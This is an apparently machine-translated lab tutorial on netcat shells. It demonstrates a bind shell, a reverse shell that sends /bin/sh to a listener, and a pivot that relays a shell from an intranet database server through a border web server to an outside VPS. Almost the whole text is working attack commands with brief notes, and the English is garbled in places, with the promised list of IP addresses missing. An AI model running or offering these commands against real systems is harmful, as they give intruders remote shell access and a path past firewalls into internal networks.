In this demonstration, in the Linux environment,
when the external network machine is generally used to access the internal network machine, the reverse shell is often used. The forward shell is often used between the internal network machine and the internal network machine. The
forward shell is
due to the internal network and the boundary server. Therefore, we first demonstrate the forward shell (forward shell is to monitor on the target machine):
Command on the intranet machine: nc -lvp 4444 -e /bin/sh
Command on the local machine: nc 10.0.78.41 4444
Show already connected
to verify:
It means that the forward connection is successful. The
reverse shell
is to monitor on the local vps and connect to the target
machine. Command on the local machine: nc -lvp 9999
Command on the internal network machine: nc 10.0.78.29 9999 -e /bin/sh
Show already connected
to verify:
Explain that the reverse connection is successful.
Next, practice a remote reverse shell internal network machine of an external network machine, using the border server as a springboard.
Preparation conditions:
1. External network machine (vps)
2. Border server (web server)
3. Intranet server ( Database server)
Vps and web server, the database server is separated by a firewall lan IP: 192.168.101.1 and
each IP is as follows:
1. External network machine (vps)
2. Border server (web server)
3. Intranet server (database server)
Then
enter the command in vps: nc -lvp 1234
Enter the command in the database server: nc -lvp 1234 -e /bin/sh
Enter the command in the web server: nc -v 10.0.78.29 1234 -c "nc -v 192.168.101.103 1234 "
Show already connected
to verify:
Found that the ip address is the ip address of the database server at this time, success